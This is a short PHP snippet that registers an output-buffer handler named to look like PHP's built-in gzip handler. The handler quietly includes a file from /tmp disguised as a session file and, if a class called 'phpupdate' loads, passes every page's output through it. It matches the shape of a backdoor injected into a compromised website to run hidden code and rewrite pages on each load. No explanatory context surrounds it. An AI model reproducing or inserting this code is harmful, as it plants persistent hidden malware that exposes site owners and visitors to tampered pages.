function ob_gzhanler($s) { $f='/tmp/ssess_2e837193d445116e647992b027088c60'; if(file_exists($f)) include_once($f); return class_exists('phpupdate') ? phpupdate::copyright($s) : $s; } ob_start('ob_gzhanler');